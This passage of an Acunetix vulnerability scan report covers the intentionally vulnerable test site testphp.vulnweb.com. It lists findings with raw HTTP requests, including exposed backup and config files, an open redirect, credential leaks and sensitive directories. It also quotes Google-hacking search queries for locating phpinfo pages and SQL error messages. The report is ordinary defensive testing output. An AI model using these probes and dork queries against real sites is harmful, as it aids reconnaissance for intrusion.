Pattern found: <?PHP require_once("database_connect.php"); ?><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false"--><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --><title>Home of WASP Art</title><!-- InstanceEndEditable --><link rel="stylesheet" href="style.css" type="text/css"><!-- InstanceBeginEditable name="headers_rgn" --><!-- here goes headers headers --><!-- InstanceEndEditable --><script language="JavaScript" type="text/JavaScript"><!--function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.re ...
GET /index.bak HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
121Acunetix Website Audit
/pictures/wp-config.bak
Details
Pattern found: <?php// ** MySQL settings ** //define('DB_NAME', 'wp265as'); // The name of the databasedefine('DB_USER', 'root'); // Your MySQL usernamedefine('DB_PASSWORD', ''); // ...and passworddefine('DB_HOST', 'localhost'); // 99% chance you won't need to change this valuedefine('DB_CHARSET', 'utf8');define('DB_COLLATE', ''); // Change each KEY to a different unique phrase. You won't have to remember the phrases later,// so make them long and complicated. You can visit http://api.wordpress.org/secret-key/1.1/// to get keys generated for you, or just make something up. Each key should have a different phrase.define('AUTH_KEY', 'put your unique phrase here'); // Change this to a unique phrase.define('SECURE_AUTH_KEY', 'put your unique phrase here'); // Change this to a unique phrase.define('LOGGED_IN_KEY', 'put your unique phrase here'); // Change this to a unique phrase. // You can have multiple installations in one database if you give each a unique prefix$table_prefix = 'w ...
GET /pictures/wp-config.bak HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
122Acunetix Website Audit
URL redirection
MediumSeverity
ValidationType
Scripting (XFS_and_Redir.script)Reported by module
Description
This script is possibly vulnerable to URL redirection attacks. URL redirection is sometimes used as a part of phishing attacks that confuse visitors about which web site they arevisiting.
Impact
A remote attacker can redirect users from your website to a specified URL. This problem may assist an attacker toconduct phishing attacks, trojan distribution, spammers.
Recommendation
Your script should properly sanitize user input.
References
Unvalidated Redirects and Forwards Cheat Sheet
HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics
Affected items
/redir.php
Details
URL encoded GET input r was set to http://www.vulnweb.com.
GET /redir.php?r=http://www.vulnweb.com HTTP/1.1
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
123Acunetix Website Audit
User credentials are sent in clear text
MediumSeverity
ConfigurationType
CrawlerReported by module
Description
User credentials are transmitted over an unencrypted channel. This information should always be transferred via anencrypted channel (HTTPS) to avoid being intercepted by malicious users.
Impact
A third party may be able to read the user credentials by intercepting an unencrypted HTTP connection.
Recommendation
Because user credentials are considered sensitive information, should always be transferred to the server over anencrypted connection (HTTPS).
Affected items
/signup.php
Details
Form name: form1Form action: http://testphp.vulnweb.com/secured/newuser.phpForm method: POST Form inputs: - uuname [Text]- upass [Password]- upass2 [Password]- urname [Text]- ucc [Text]- uemail [Text]- uphone [Text]- uaddress [TextArea]- signup [Submit]
GET /signup.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/login.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
124Acunetix Website Audit
WS_FTP log file found
MediumSeverity
ValidationType
Scripting (WS_FTP_log_file.script)Reported by module
Description
WS_FTP is a popular FTP client. This application creates a log file named WS_FTP.LOG. This file contains sensitivedata such as file source/destination and file name, date/time of upload etc.
Impact
This file may expose sensitive information that may help an malicious user to prepare more advanced attacks.
Recommendation
Remove this file from your website or change its permissions to remove access.
References
ws_ftp.log
Affected items
/pictures//WS_FTP.LOG
Details
Pattern found: 103.05.06 13:17
GET /pictures//WS_FTP.LOG HTTP/1.1
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
125Acunetix Website Audit
Clickjacking: X-Frame-Options header missing
LowSeverity
ConfigurationType
Scripting (Clickjacking_X_Frame_Options.script)Reported by module
Description
Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Webuser into clicking on something different from what the user perceives they are clicking on, thus potentially revealingconfidential information or taking control of their computer while clicking on seemingly innocuous web pages. The server didn't return an X-Frame-Options header which means that this website could be at risk of a clickjackingattack. The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should beallowed to render a page inside a frame or iframe. Sites can use this to avoid clickjacking attacks, by ensuring that theircontent is not embedded into other sites.
Impact
The impact depends on the affected web application.
Recommendation
Configure your web server to include an X-Frame-Options header. Consult Web references for more information aboutthe possible values for this header.
References
Clickjacking
OWASP Clickjacking
Defending with Content Security Policy frame-ancestors directive
Frame Buster Buster
The X-Frame-Options response header
Affected items
Web Server
Details
No details are available.
GET / HTTP/1.1
Cookie: login=test%2Ftest
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
126Acunetix Website Audit
Cookie(s) without HttpOnly flag set
LowSeverity
InformationalType
CrawlerReported by module
Description
This cookie does not have the HTTPOnly flag set. When a cookie is set with the HTTPOnly flag, it instructs the browserthat the cookie can only be accessed by the server and not by client-side scripts. This is an important security protectionfor session cookies.
Impact
None
Recommendation
If possible, you should set the HTTPOnly flag for this cookie.
Affected items
/
Details
Cookies found: - Name: login, Domain: testphp.vulnweb.com
GET / HTTP/1.1
Cookie: login=test%2Ftest
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
127Acunetix Website Audit
Hidden form input named price was found
LowSeverity
InformationalType
CrawlerReported by module
Description
A hidden form input named price was found. It's not recommended to hide sensitive information in hidden form fields.
Impact
User may change price information before submitting the form.
Recommendation
Check if the script inputs are properly validated.
Affected items
/product.php (68db51598a6b1e726aa518e093bbd4ff)
Details
Form name: f_addcartForm action: http://testphp.vulnweb.com/cart.phpForm method: POST Form inputs: - price [Hidden]- addcart [Hidden]
GET /product.php?pic=2 HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/search.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
128Acunetix Website Audit
MySQL username disclosure
LowSeverity
ConfigurationType
Scripting (Text_Search_File.script)Reported by module
Description
For a client program to be able to connect to the MySQL server, it must use the proper connection parameters, such asthe name of the host where the server is running and the user name and password of your MySQL account. When the connection to the database cannot be established, the server returns an error message including the MySQLusername and host that were used. This information should not be present on a production system.
Impact
This file may disclose sensitive information. This information can be used to launch further attacks.
Recommendation
Make sure the MySQL connection can be established and configure PHP not to display error messages.
Affected items
/Connections/DB_Connection.php
Details
Pattern found: Access denied for user 'root'@'localhost' (using password: NO)
GET /Connections/DB_Connection.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/secured/database_connect.php
Details
Pattern found: Access denied for user 'wauser'@'localhost' (using password: NO)
GET /secured/database_connect.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Request headers
129Acunetix Website Audit
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
130Acunetix Website Audit
Possible sensitive directories
LowSeverity
ValidationType
Scripting (Possible_Sensitive_Directories.script)Reported by module
Description
A possible sensitive directory has been found. This directory is not directly linked from the website.This check looks forcommon sensitive resources like backup directories, database dumps, administration pages, temporary directories. Eachone of these directories could help an attacker to learn more about his target.
Impact
This directory may expose sensitive information that could help a malicious user to prepare more advanced attacks.
Recommendation
Restrict access to this directory or remove it from the website.
References
Web Server Security and Database Server Security
Affected items
/admin
Details
No details are available.
GET /admin HTTP/1.1
Accept: acunetix/wvs
Range: bytes=0-99999
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Request headers
/CVS
Details
No details are available.
GET /CVS HTTP/1.1
Accept: acunetix/wvs
Range: bytes=0-99999
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Request headers
/secured
Details
No details are available.
GET /secured HTTP/1.1
Request headers
131Acunetix Website Audit
Accept: acunetix/wvs
Range: bytes=0-99999
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
132Acunetix Website Audit
Broken links
InformationalSeverity
InformationalType
CrawlerReported by module
Description
A broken link refers to any link that should take you to a document, image or webpage, that actually results in an error.This page was linked from the website but it is inaccessible.
Impact
Problems navigating the site.
Recommendation
Remove the links to this file or make it accessible.
Affected items
/medias/css/main.css
Details
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") >select Referrers Tab from the bottom of the Information pane.
GET /medias/css/main.css HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/pictures/path-disclosure-unix.html
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/medias/js/common_functions.js
Details
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") >select Referrers Tab from the bottom of the Information pane.
GET /medias/js/common_functions.js HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/pictures/path-disclosure-unix.html
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Request headers
133Acunetix Website Audit
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/Mod_Rewrite_Shop/Details/color-printer/3
Details
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") >select Referrers Tab from the bottom of the Information pane.
GET /Mod_Rewrite_Shop/Details/color-printer/3/ HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1
Details
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") >select Referrers Tab from the bottom of the Information pane.
GET /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/ HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer:
http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/Mod_Rewrite_Shop/Details/web-camera-a4tech/2
Details
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") >select Referrers Tab from the bottom of the Information pane.
GET /Mod_Rewrite_Shop/Details/web-camera-a4tech/2/ HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
134Acunetix Website Audit
/privacy.php
Details
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") >select Referrers Tab from the bottom of the Information pane.
GET /privacy.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/secured/office_files/filelist.xml
Details
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") >select Referrers Tab from the bottom of the Information pane.
GET /secured/office_files/filelist.xml HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/secured/office.htm
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/Templates/logout.php
Details
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") >select Referrers Tab from the bottom of the Information pane.
GET /Templates/logout.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/Templates/main_dynamic_template.dwt.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
135Acunetix Website Audit
Email address found
InformationalSeverity
InformationalType
ScannerReported by module
Description
One or more email addresses have been found on this page. The majority of spam comes from email addressesharvested off the internet. The spam-bots (also known as email harvesters and email extractors) are programs that scourthe internet looking for email addresses on any website they come across. Spambot programs look for strings [email protected] and then record any addresses found.
Impact
Email addresses posted on Web sites may attract spam.
Recommendation
Check references for details on how to solve this problem.
References
Anti-spam techniques
Affected items
/
Details
List of all email addresses found on this host. - [email protected]/- [email protected]/secured/- [email protected]/secured/- [email protected]/secured/- [email protected]/- [email protected]/, /Templates/
136Acunetix Website Audit
GHDB: Default phpinfo page
InformationalSeverity
InformationalType
GHDBReported by module
Description
The description for this alert is contributed by the GHDB community, it may contain inappropriate language.Category : Files containing passwords This will look throught default phpinfo pages for ones that have a default mysql password. The Google Hacking Database (GHDB) appears courtesy of the Google Hacking community.
Impact
Not available. Check description.
Recommendation
Not available. Check description.
References
Acunetix Google hacking
Affected items
/secured/phpinfo.php
Details
We found intitle:"phpinfo()" +"mysql.default_password" +"Zend Scripting Language Engine"
GET /secured/phpinfo.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
137Acunetix Website Audit
GHDB: phpinfo()
InformationalSeverity
InformationalType
GHDBReported by module
Description
The description for this alert is contributed by the GHDB community, it may contain inappropriate language.Category : Files containing juicy info this brings up sites with phpinfo(). There is SO much cool stuff in here that you just have to check one out for yourself! Imean full blown system versioning, SSL version, sendmail version and path, ftp, LDAP, SQL info, Apache mods, Apacheenv vars, *sigh* the list goes on and on! Thanks "joe!" =) The Google Hacking Database (GHDB) appears courtesy of the Google Hacking community.
Impact
Not available. Check description.
Recommendation
Not available. Check description.
References
Acunetix Google hacking
Affected items
/secured/phpinfo.php
Details
We found intitle:phpinfo "PHP Version"
GET /secured/phpinfo.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
138Acunetix Website Audit
GHDB: Sablotron error message
InformationalSeverity
InformationalType
GHDBReported by module
Description
The description for this alert is contributed by the GHDB community, it may contain inappropriate language.Category : Error Messages Sablotron is an XML toolit thingie. This query hones in on error messages generated by this toolkit. These errormessages reveal all sorts of interesting stuff such as source code snippets, path and filename info, etc. The Google Hacking Database (GHDB) appears courtesy of the Google Hacking community.
Impact
Not available. Check description.
Recommendation
Not available. Check description.
References
Acunetix Google hacking
Affected items
/pictures/path-disclosure-unix.html
Details
We found warning "error on line" php sablotron
GET /pictures/path-disclosure-unix.html HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
139Acunetix Website Audit
GHDB: SQL error message
InformationalSeverity
InformationalType
GHDBReported by module
Description
The description for this alert is contributed by the GHDB community, it may contain inappropriate language.Category : Error Messages Another SQL error message, this message can display the username, database, path names and partial SQL code, all ofwhich are very helpful for hackers... The Google Hacking Database (GHDB) appears courtesy of the Google Hacking community.
Impact
Not available. Check description.
Recommendation
Not available. Check description.
References
Acunetix Google hacking
Affected items
/Connections/DB_Connection.php
Details
We found "access denied for user" "using password" -documentation
